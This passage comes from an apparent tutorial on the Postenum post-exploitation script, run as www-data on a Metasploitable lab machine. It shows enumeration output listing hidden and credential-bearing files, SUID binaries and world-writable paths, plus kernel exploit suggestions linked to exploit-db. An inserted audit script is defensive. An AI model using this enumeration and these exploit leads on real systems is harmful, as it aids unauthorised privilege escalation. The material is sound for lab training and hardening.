-rw-r--r-- 1 www-data www-data 18684 Mar 16 2010 /var/www/dvwa/external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php
-rw-r--r-- 1 www-data www-data 2772 Mar 16 2010 /var/www/dvwa/external/phpids/0.6/lib/IDS/Config/Config.ini
-rw-r--r-- 1 www-data www-data 576 May 20 2012 /var/www/dvwa/config/config.inc.php
-rw-r--r-- 1 www-data www-data 576 Aug 26 2010 /var/www/dvwa/config/config.inc.php~
-rwxr-xr-x 1 www-data www-data 175 Apr 4 2018 /var/www/mutillidae/config.inc
-rwxr-xr-x 1 www-data www-data 20810 Apr 11 2011 /var/www/mutillidae/owasp-esapi-php/lib/htmlpurifier/HTMLPurifier/Config.php
-rw-r--r-- 1 www-data www-data 60881 Dec 9 2008 /var/www/phpMyAdmin/libraries/config.default.php
-rw-r--r-- 1 www-data www-data 4066 Dec 9 2008 /var/www/phpMyAdmin/libraries/auth/config.auth.lib.php
-rw-r--r-- 1 www-data www-data 35105 Dec 9 2008 /var/www/phpMyAdmin/libraries/Config.class.php
-rw-r--r-- 1 www-data www-data 2093 Dec 9 2008 /var/www/phpMyAdmin/config.sample.inc.php
-rw-r--r-- 1 www-data www-data 1584 Dec 9 2008 /var/www/phpMyAdmin/setup/frames/config.inc.php
-rw-r--r-- 1 www-data www-data 2719 Dec 9 2008 /var/www/phpMyAdmin/setup/config.php
-rw-rw-r-- 1 www-data www-data 1770 Aug 26 2004 /var/www/tikiwiki-old/lib/sheet/conf/config.inc.php
-rw-rw-r-- 1 www-data www-data 3383 Feb 21 2008 /var/www/tikiwiki-old/lib/Galaxia/config.tikiwiki.php
-rw-rw-r-- 1 www-data www-data 3383 Feb 21 2008 /var/www/tikiwiki-old/lib/Galaxia/config.php
-rw-rw-r-- 1 www-data www-data 3449 Feb 21 2008 /var/www/tikiwiki-old/lib/Galaxia/config.xaraya.php
-rw-rw-r-- 1 www-data www-data 9269 Nov 12 2005 /var/www/tikiwiki-old/lib/wiki3d/src/java/br/arca/morcego/Config.java
-rw-rw-r-- 1 www-data www-data 45 Mar 12 2005 /var/www/tikiwiki-old/lib/smarty/unit_test/config.php
-rw-rw-r-- 1 www-data www-data 258 Apr 24 2003 /var/www/tikiwiki-old/img/icons/config.gif
-rw-rw-r-- 1 www-data www-data 1770 Aug 26 2004 /var/www/tikiwiki/lib/sheet/conf/config.inc.php
-rw-rw-r-- 1 www-data www-data 3219 Jan 28 2006 /var/www/tikiwiki/lib/Galaxia/config.tikiwiki.php
-rw-rw-r-- 1 www-data www-data 3219 Jan 30 2006 /var/www/tikiwiki/lib/Galaxia/config.php
-rw-rw-r-- 1 www-data www-data 3259 Jan 28 2004 /var/www/tikiwiki/lib/Galaxia/config.xaraya.php
-rw-rw-r-- 1 www-data www-data 9269 Nov 12 2005 /var/www/tikiwiki/lib/wiki3d/src/java/br/arca/morcego/Config.java
-rw-rw-r-- 1 www-data www-data 45 Mar 12 2005 /var/www/tikiwiki/lib/smarty/unit_test/config.php
-rw-rw-r-- 1 www-data www-data 258 Apr 24 2003 /var/www/tikiwiki/img/icons/config.gif
[+] - Search for hidden files
[x] Hidden files:
-rw-r--r-- 1 service service 586 Apr 16 2010 /home/service/.profile
-rw-r--r-- 1 service service 2928 Apr 16 2010 /home/service/.bashrc
-rw-r--r-- 1 service service 220 Apr 16 2010 /home/service/.bash_logout
-rw-r--r-- 1 user user 586 Mar 31 2010 /home/user/.profile
-rw------- 1 user user 165 May 7 2010 /home/user/.bash_history
-rw-r--r-- 1 user user 2928 Mar 31 2010 /home/user/.bashrc
-rw-r--r-- 1 user user 220 Mar 31 2010 /home/user/.bash_logout
-rw------- 1 root root 4174 May 14 2012 /home/msfadmin/.mysql_history
-rw-r--r-- 1 msfadmin msfadmin 1598 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/bin/.htaccess.txt
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Sandbox/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 1436 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Sandbox/.changes
-rw-r--r-- 1 msfadmin msfadmin 210 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/.htpasswd
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Main/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 3657 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Main/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Know/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 3489 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Know/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/TWiki/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 4189 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/TWiki/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/_default/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 683 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/_default/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Trash/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 767 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Trash/.changes
-rwx------ 1 msfadmin msfadmin 4 May 20 2012 /home/msfadmin/.rhosts
-rw-r--r-- 1 msfadmin msfadmin 586 Mar 16 2010 /home/msfadmin/.profile
-rw-r--r-- 1 msfadmin msfadmin 0 May 7 2010 /home/msfadmin/.sudo_as_admin_successful
-rw------- 1 msfadmin msfadmin 0 Jun 6 2018 /home/msfadmin/.Xauthority
-rw-rw-rw- 1 root daemon 1 Aug 8 2018 /lib/tls/i686/cmov/.4tJrYgzxS.so
-rw-rw-rw- 1 root daemon 1 Jun 19 12:56 /lib/tls/i686/cmov/.CsUPZ8Z0.so
-rw-r--r-- 1 root root 5 Dec 5 2007 /usr/share/python-support/antlr/.version
-rw-r--r-- 1 root root 2 Aug 29 2007 /usr/share/python-support/python-gnupginterface/.version
-rw-r--r-- 1 root root 0 May 20 2012 /usr/lib/firefox-3.6.17/.autoreg
-rw-r--r-- 1 root root 1258 Mar 10 2008 /usr/lib/jvm/.java-gcj.jinfo
-rw------- 1 root root 215 Jun 19 13:46 /root/.mysql_history
-rwx------ 1 root root 4 May 20 2012 /root/.rhosts
-rw-r--r-- 1 root root 141 Oct 20 2007 /root/.profile
-rw-r--r-- 1 root root 173 Jun 19 2019 /root/.bash_history
-rw------- 1 root root 324 Jun 19 13:21 /root/.Xauthority
-rw-r--r-- 1 root root 2227 Oct 20 2007 /root/.bashrc
-rw-r--r-- 1 root root 102 Apr 8 2008 /etc/cron.monthly/.placeholder
-rw-r--r-- 1 root root 102 Apr 8 2008 /etc/cron.weekly/.placeholder
-rw-r--r-- 1 root root 102 Apr 8 2008 /etc/cron.d/.placeholder
-rw-r--r-- 1 root root 586 Apr 14 2008 /etc/skel/.profile
-rw-r--r-- 1 root root 2928 Apr 14 2008 /etc/skel/.bashrc
-rw-r--r-- 1 root root 220 Apr 14 2008 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 102 Apr 8 2008 /etc/cron.daily/.placeholder
-rw-r--r-- 1 root root 102 Apr 8 2008 /etc/cron.hourly/.placeholder
-rw------- 1 root root 0 Mar 16 2010 /etc/.pwd.lock
-rw-r--r-- 1 root root 0 Jun 19 13:20 /dev/.initramfs-tools
-rw------- 1 postgres postgres 34 Jun 19 13:21 /var/run/postgresql/.s.PGSQL.5432.lock
-rw-r--r-- 1 root root 34 May 13 2012 /var/lib/python-support/python2.5/.path
-rw------- 1 postgres postgres 131 Mar 30 2010 /var/lib/postgresql/.bash_history
-rwxr-xr-x 1 www-data www-data 497 Sep 8 2010 /var/www/dvwa/.htaccess
-rwxr-xr-x 1 www-data www-data 174 Apr 11 2011 /var/www/mutillidae/.buildpath
-rwxr-xr-x 1 www-data www-data 712 Apr 11 2011 /var/www/mutillidae/.project
-rwxr-xr-x 1 www-data www-data 427 May 14 2012 /var/www/mutillidae/.htaccess
-rw-r--r-- 1 www-data www-data 118 Dec 9 2008 /var/www/phpMyAdmin/libraries/.htaccess
-rwxrwxr-x 1 www-data www-data 66 Jan 22 2005 /var/www/tikiwiki-old/modules/cache/.htaccess
-rwxrwxr-x 1 www-data www-data 66 Jan 19 2005 /var/www/tikiwiki-old/templates_c/.htaccess
-rw-r--r-- 1 www-data www-data 1598 Jun 1 2002 /var/www/twiki/bin/.htaccess.txt
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/Sandbox/.mailnotify
-rwxrwxrwx 1 www-data www-data 1436 Feb 1 2003 /var/www/twiki/data/Sandbox/.changes
-rw-r--r-- 1 www-data www-data 210 Jan 11 2003 /var/www/twiki/data/.htpasswd
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/Main/.mailnotify
-rwxrwxrwx 1 www-data www-data 3653 Apr 16 2010 /var/www/twiki/data/Main/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/Know/.mailnotify
-rwxrwxrwx 1 www-data www-data 3489 Jan 30 2003 /var/www/twiki/data/Know/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/TWiki/.mailnotify
-rwxrwxrwx 1 www-data www-data 4189 Feb 1 2003 /var/www/twiki/data/TWiki/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/_default/.mailnotify
-rwxrwxrwx 1 www-data www-data 683 Jan 30 2003 /var/www/twiki/data/_default/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25 2001 /var/www/twiki/data/Trash/.mailnotify
-rwxrwxrwx 1 www-data www-data 767 Jan 25 2003 /var/www/twiki/data/Trash/.changes
-rw------- 1 www-data www-data 4275 Jun 19 2019 /var/www/.bash_history
-rw-rw-r-- 1 www-data www-data 66 Jan 22 2005 /var/www/tikiwiki/modules/cache/.htaccess
-rw-rw-r-- 1 www-data www-data 66 Jan 19 2005 /var/www/tikiwiki/templates_c/.htaccess
-r--r--r-- 1 root root 11 Jun 19 13:21 /tmp/.X0-lock
[+] - Check for clear-text password on /home/*
[x] Clear text password:
-rwxr-xr-x 1 msfadmin msfadmin 6936 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/bin/passwd
[+] - The most interesting ssh files /
[x] SSH files:
-rw-r--r-- 1 root root 442 May 20 2012 /root/.ssh/known_hosts
-rw-r--r-- 1 root root 405 May 17 2010 /root/.ssh/authorized_keys
[+] - Check sticky bits, SUID and SGID
[x] SUID - 4000:
-rwsr-xr-x 1 root root 63584 Apr 14 2008 /bin/umount
-rwsr-xr-- 1 root fuse 20056 Feb 26 2008 /bin/fusermount
-rwsr-xr-x 1 root root 25540 Apr 2 2008 /bin/su
-rwsr-xr-x 1 root root 81368 Apr 14 2008 /bin/mount
-rwsr-xr-x 1 root root 30856 Dec 10 2007 /bin/ping
-rwsr-xr-x 1 root root 26684 Dec 10 2007 /bin/ping6
-rwsr-xr-x 1 root root 65520 Dec 2 2008 /sbin/mount.nfs
-rwsr-xr-- 1 root dhcp 2960 Apr 2 2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 2 root root 107776 Feb 25 2008 /usr/bin/sudoedit
-rwsr-sr-x 1 root root 7460 Jun 25 2008 /usr/bin/X
-rwsr-xr-x 1 root root 8524 Nov 22 2007 /usr/bin/netkit-rsh
-rwsr-xr-x 1 root root 37360 Apr 2 2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 12296 Dec 10 2007 /usr/bin/traceroute6.iputils
-rwsr-xr-x 2 root root 107776 Feb 25 2008 /usr/bin/sudo
-rwsr-xr-x 1 root root 12020 Nov 22 2007 /usr/bin/netkit-rlogin
-rwsr-xr-x 1 root root 11048 Dec 10 2007 /usr/bin/arping
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
-rwsr-xr-x 1 root root 19144 Apr 2 2008 /usr/bin/newgrp
-rwsr-xr-x 1 root root 28624 Apr 2 2008 /usr/bin/chfn
-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 23952 Apr 2 2008 /usr/bin/chsh
-rwsr-xr-x 1 root root 15952 Nov 22 2007 /usr/bin/netkit-rcp
-rwsr-xr-x 1 root root 29104 Apr 2 2008 /usr/bin/passwd
-rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 269256 Oct 4 2007 /usr/sbin/pppd
-rwsr-xr-- 1 root telnetd 6040 Dec 17 2006 /usr/lib/telnetlogin
-rwsr-xr-- 1 root www-data 10276 Mar 9 2010 /usr/lib/apache2/suexec
-rwsr-xr-x 1 root root 4524 Nov 5 2007 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 165748 Apr 6 2008 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9624 Aug 17 2009 /usr/lib/pt_chown
[x] SGID - 2000:
-rwxr-sr-x 1 root shadow 19584 Apr 9 2008 /sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 3192 Apr 22 2008 /usr/bin/Eterm
-rwsr-sr-x 1 root root 7460 Jun 25 2008 /usr/bin/X
-rwxr-sr-x 1 root tty 8192 Dec 12 2007 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 76580 Apr 6 2008 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 30508 Mar 8 2008 /usr/bin/mlocate
-rwxr-sr-x 1 root crontab 26928 Apr 8 2008 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 37904 Apr 2 2008 /usr/bin/chage
-rwxr-sr-x 1 root utmp 308228 Oct 23 2007 /usr/bin/screen
-rwxr-sr-x 1 root shadow 16424 Apr 2 2008 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
-rwxr-sr-x 1 root utmp 306996 Jan 2 2009 /usr/bin/xterm
-rwxr-sr-x 1 root tty 9960 Apr 14 2008 /usr/bin/wall
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
-r-xr-sr-x 1 root postdrop 10312 Apr 18 2008 /usr/sbin/postqueue
-r-xr-sr-x 1 root postdrop 10036 Apr 18 2008 /usr/sbin/postdrop
[x] Sticky bit for folders - 1000:
drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm
drwxrwxr-t 2 root postgres 4096 May 8 2010 /var/log/postgresql
drwxrwxrwt 3 root root 60 Jun 19 13:21 /var/lock
drwx-wx-wt 2 root root 118784 Jun 19 13:29 /var/lib/php5
drwxrwxrwt 2 root root 4096 Jun 19 13:35 /var/tmp
drwxrwxrwt 3 root root 4096 Jun 19 2019 /var/www/dav
drwxrwx--T 2 daemon daemon 4096 Mar 16 2010 /var/spool/cron/atjobs
drwxrwx--T 2 daemon daemon 4096 Feb 20 2007 /var/spool/cron/atspool
drwx-wx--T 2 root crontab 4096 Apr 8 2008 /var/spool/cron/crontabs
drwx-wx--T 2 postfix postdrop 4096 May 7 2010 /var/spool/postfix/maildrop
drwxrwxrwt 4 root root 4096 Jun 19 13:23 /tmp
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.X11-unix
[+] - Check for written and executable places
[x] World-writable folders - 222:
drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm
drwxrwxrwt 3 root root 60 Jun 19 13:21 /var/lock
drwx-wx-wt 2 root root 118784 Jun 19 13:29 /var/lib/php5
drwxrwxrwt 2 root root 4096 Jun 19 13:35 /var/tmp
drwxrwxrwt 3 root root 4096 Jun 19 2019 /var/www/dav
drwxrwxrwx 2 www-data www-data 4096 Feb 1 2003 /var/www/twiki/data/Sandbox
drwxrwxrwx 2 www-data www-data 4096 Apr 16 2010 /var/www/twiki/data/Main
drwxrwxrwx 2 www-data www-data 4096 Jan 30 2003 /var/www/twiki/data/Know
drwxrwxrwx 2 www-data www-data 16384 Feb 1 2003 /var/www/twiki/data/TWiki
drwxrwxrwx 2 www-data www-data 4096 Jan 30 2003 /var/www/twiki/data/_default
drwxrwxrwx 2 www-data www-data 4096 Feb 1 2003 /var/www/twiki/data/Trash
drwxrwxrwx 2 www-data www-data 4096 Apr 21 2002 /var/www/twiki/pub/Sandbox
drwxrwxrwx 2 www-data www-data 4096 Apr 7 2002 /var/www/twiki/pub/Main
drwxrwxrwx 3 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/Know
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL
drwxrwxrwx 8 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki
drwxrwxrwx 2 www-data www-data 4096 Jan 21 2003 /var/www/twiki/pub/TWiki/TWikiDocGraphics
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki/TWikiTemplates
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki/TWikiLogos
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki/PreviewBackground
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki/FileAttachment
drwxrwxrwx 2 www-data www-data 4096 Nov 18 2002 /var/www/twiki/pub/TWiki/WabiSabi
drwxrwxrwx 2 www-data www-data 4096 Dec 4 2001 /var/www/twiki/pub/Trash
drwxrwxrwx 2 www-data www-data 4096 Feb 1 2003 /var/www/twiki/pub/icn
drwxrwxrwt 4 root root 4096 Jun 19 13:23 /tmp
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.X11-unix
[x] World-writable files - 0002:
304795 4 -rw-rw-rw- 1 root daemon 1 Aug 8 2018 /lib/tls/i686/cmov/.4tJrYgzxS.so
304796 4 -rw-rw-rw- 1 root daemon 1 Jun 19 12:56 /lib/tls/i686/cmov/.CsUPZ8Z0.so
11265 0 srw-rw-rw- 1 root root 0 Jun 19 13:21 /dev/log
10037 0 drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm
6130 0 crw-rw-rw- 1 root root Mar 16 2010 /dev/null
5082 0 crw-rw-rw- 1 root tty Jun 19 13:20 /dev/ttyzf
...
[+] - Check for readable logfiles owned by root
[x] World-readable logfiles - 0004:
-rw-r--r-- 1 root root 88953 Jul 5 2018 /var/log/dpkg.log
-rw-r--r-- 1 root root 5376 Jun 19 13:22 /var/log/wtmp
-rw-r--r-- 1 root root 96 Mar 16 2010 /var/log/installer/lsb-release
-rw-r--r-- 1 root root 0 Mar 16 2010 /var/log/installer/initial-status.gz
-rw-r--r-- 1 root root 58721 Mar 16 2010 /var/log/installer/status
-rw-r--r-- 1 root root 46866 Mar 16 2010 /var/log/installer/hardware-summary
-rw-r--r-- 1 root adm 16950 Jun 19 13:41 /var/log/dmesg.0
-rw-r--r-- 1 root root 292114 Jun 19 13:20 /var/log/udev
-rw-r--r-- 1 root adm 6419 Jun 19 13:52 /var/log/dmesg.4.gz
-rw-r--r-- 1 root adm 6405 Jun 19 13:21 /var/log/dmesg.3.gz
-rw-r--r-- 1 root news 0 Mar 16 2010 /var/log/news/news.crit
-rw-r--r-- 1 root news 0 Mar 16 2010 /var/log/news/news.notice
-rw-r--r-- 1 root news 0 Mar 16 2010 /var/log/news/news.err
-rw-r--r-- 1 root root 0 May 20 2012 /var/log/boot
-rw-r--r-- 1 root adm 6446 Jun 19 13:20 /var/log/dmesg.2.gz
-rw-r--r-- 1 root root 0 May 20 2012 /var/log/btmp
-rw-r--r-- 1 root adm 6414 Jun 19 13:21 /var/log/dmesg.1.gz
-rw-r--r-- 1 root root 292292 Jun 19 13:22 /var/log/lastlog
-rw-r--r-- 1 root adm 16992 Jun 19 13:21 /var/log/dmesg
[+] - List NFS shares and permisisons
[x] NFS:
-rw-r--r-- 1 root root 367 May 13 2012 /etc/exports
It begins by checking for any interesting files located in standard web server directories. Next, it looks for hidden files, SSH files, and any clear text passwords in the home directories. It will then check for SUID, SGID, and sticky bits. Finally, it looks for any writable and executable directories and includes any NFS shares that are present on the system.
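As an added example (not part of Postenum or this walkthrough), the POSIX shell script below filters listings in the format printed by the -s phase so that only unexpected SUID-root binaries and world-writable regular files under system paths remain; the baseline list and the /etc/cron.d sample row are constructed for the example, the other sample rows mirror the output above.

```shell
#!/bin/sh
# Added example, not part of Postenum: triage the SUID and world-writable
# listings from the -s phase against a baseline, so that the entries worth a
# second look (an unexpected SUID-root binary, a world-writable regular file
# under a system path) stand out instead of being buried in the full listing.

# Baseline of SUID-root binaries expected on this host.  Constructed for the
# example; a real baseline comes from a known-good build of the same image.
SUID_BASELINE="/bin/su /bin/mount /bin/umount /bin/ping /bin/ping6
/usr/bin/sudo /usr/bin/sudoedit /usr/bin/passwd /usr/bin/chsh /usr/bin/chfn
/usr/bin/gpasswd /usr/bin/newgrp"

# Prefixes under which a world-writable regular file is almost never legitimate.
SYSTEM_PREFIXES="/lib /usr /etc /bin /sbin"

# postenum prints world-writable files in `find -ls` format (inode and block
# count first); drop those two leading fields so the same filters apply.
strip_find_ls() { awk '$1 ~ /^[0-9]+$/ { $1 = ""; $2 = "" } { print }'; }

# Read `ls -l` style lines on stdin and print the path of every SUID binary
# owned by root that is not in the baseline.  The date always occupies three
# fields in ls -l output, so the path is everything from the ninth field on.
suid_root_unexpected() {
    _base=" $(printf '%s' "$SUID_BASELINE" | tr '\n' ' ') "
    while read -r mode _links owner _group _size _m _d _t path; do
        case $mode in ???[sS]*) ;; *) continue ;; esac   # owner setuid bit set
        [ "$owner" = root ] || continue                   # non-root SUID not covered here
        case $_base in *" $path "*) continue ;; esac     # known-good entry
        printf '%s\n' "$path"
    done
    return 0
}

# Same input format; print world-writable regular files under a system
# prefix.  Sockets, devices and sticky-bit directories are skipped because
# their mode string does not start with "-".
worldwritable_suspicious() {
    while read -r mode _links _owner _group _size _m _d _t path; do
        case $mode in -???????w*) ;; *) continue ;; esac  # type "-", other-write set
        for p in $SYSTEM_PREFIXES; do
            case $path in "$p"/*) printf '%s\n' "$path"; break ;; esac
        done
    done
    return 0
}

# Live use on a host (not run in this example): feed real listings through
# the same two filters.
live_audit() {
    find / -xdev -type f -perm -4000 -exec ls -ld {} + 2>/dev/null | suid_root_unexpected
    find / -xdev -type f -perm -0002 -exec ls -ld {} + 2>/dev/null | worldwritable_suspicious
}

# Constructed sample lines modelled on the listing above (the /etc/cron.d
# entry is invented for the example; the others mirror real rows).
SAMPLE_SUID='-rwsr-xr-x 1 root root 25540 Apr 2 2008 /bin/su
-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
-rwsr-xr-- 1 root fuse 20056 Feb 26 2008 /bin/fusermount'
SAMPLE_WW='304795 4 -rw-rw-rw- 1 root daemon 1 Aug 8 2018 /lib/tls/i686/cmov/.4tJrYgzxS.so
11265 0 srw-rw-rw- 1 root root 0 Jun 19 13:21 /dev/log
10037 0 drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm
-rw-rw-rw- 1 root root 12 Jun 19 13:00 /etc/cron.d/nightly-backup'

echo "SUID root binaries outside the baseline:"
printf '%s\n' "$SAMPLE_SUID" | suid_root_unexpected
echo "World-writable regular files under system paths:"
printf '%s\n' "$SAMPLE_WW" | strip_find_ls | worldwritable_suspicious
```

Run against the listing above, a filter like this surfaces the SUID nmap binary and the two world-writable, randomly named .so files under /lib/tls/i686/cmov, which is not a place a package would leave writable libraries and is worth investigating on any host where it appears.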
Phase 9: OS Info & Kernel Exploits
The next option we'll look at will give us information pertaining to the operating system and will suggest any relevant kernel exploits that could potentially be used to escalate privileges and get root. Use the -o switch for this:
target:/var/tmp$ ./postenum.sh -o
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] OPERATING SYSTEM
[+] - Check current user and group information
[x] The current user and group information:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[x] The current user:
www-data
[+] - Check distribution type and version number
[x] The distribution type and version:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"
[+] - Check kernel version
[x] Kernel version and (32-bit/64-bit):
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[x] Kernel version and gcc version used to compile the kernel:
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008
[+] - Exploits
[x] Possible exploits for linux kernel 2.6.24:
Listing the most popular exploits for kernel 4*
------------------------------------------------------
Linux Kernel 2.6.39 < 3.2.2 Gentoo / Ubuntu x86-x64 Mempodipper(1) - https://www.exploit-db.com/exploits/18411
Linux Kernel 2.6.39 < 3.2.2 x86-x64 Mempodipper(2) - https://www.exploit-db.com/exploits/35161
Linux Kernel 3.7.6 (RedHat x86/x64) - https://www.exploit-db.com/exploits/27297
Linux Kernel 3.13 < 3.19 Ubuntu 12.04/14.04/14.10/15.04 - https://www.exploit-db.com/exploits/37292
Linux Kernel 3.13 SGID - https://www.exploit-db.com/exploits/33824
Linux Kernel 3.13.1 (Metasploit) - https://www.exploit-db.com/exploits/40503
Linux Kernel 3.14.5 (CentOS 7 / RHEL) - https://www.exploit-db.com/exploits/35370
Linux Kernel 3.x (Ubuntu 14.04/Mint 17.3/Fedora 22) https://www.exploit-db.com/exploits/41999
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - https://www.exploit-db.com/exploits/44298
Linux kernel < 4.10.15 Race Condition - https://www.exploit-db.com/exploits/43345
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - https://www.exploit-db.com/exploits/45010
Linux Kernel 2.6.22 < 3.9 Dirty Cow - https://www.exploit-db.com/exploits/40839
Linux Kernel 2.6.22 < 3.9 Dirty Cow (x86-x64) - https://www.exploit-db.com/exploits/40616
The most specific exploits for your kernel 2.6.24
------------------------------------------------------
Nothing extract from exploits, for kernel 2.6.24
First, it will give us the current user and group information. It will then show us the distribution name and release number, followed by the kernel version and information about how the kernel was compiled. Next, it lists possible exploits based on the kernel version along with links to their Exploit Database pages.
Finally, there is one last option for Postenum — the ability to run all these options at once. Use the -a switch for this one:
target:/var/tmp$ ./postenum.sh -a
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] OPERATING SYSTEM
[+] - Check current user and group information
[x] The current user and group information:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[x] The current user:
www-data
[+] - Check distribution type and version number
[x] The distribution type and version:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"
[+] - Check kernel version
[x] Kernel version and (32-bit/64-bit):
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[x] Kernel version and gcc version used to compile the kernel:
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008
[+] - Exploits
[x] Possible exploits for linux kernel 2.6.24:
Listing the most popular exploits for kernel 4*
------------------------------------------------------
Linux Kernel 2.6.39 < 3.2.2 Gentoo / Ubuntu x86-x64 Mempodipper(1) - https://www.exploit-db.com/exploits/18411
Linux Kernel 2.6.39 < 3.2.2 x86-x64 Mempodipper(2) - https://www.exploit-db.com/exploits/35161
Linux Kernel 3.7.6 (RedHat x86/x64) - https://www.exploit-db.com/exploits/27297
Linux Kernel 3.13 < 3.19 Ubuntu 12.04/14.04/14.10/15.04 - https://www.exploit-db.com/exploits/37292
Linux Kernel 3.13 SGID - https://www.exploit-db.com/exploits/33824
Linux Kernel 3.13.1 (Metasploit) - https://www.exploit-db.com/exploits/40503
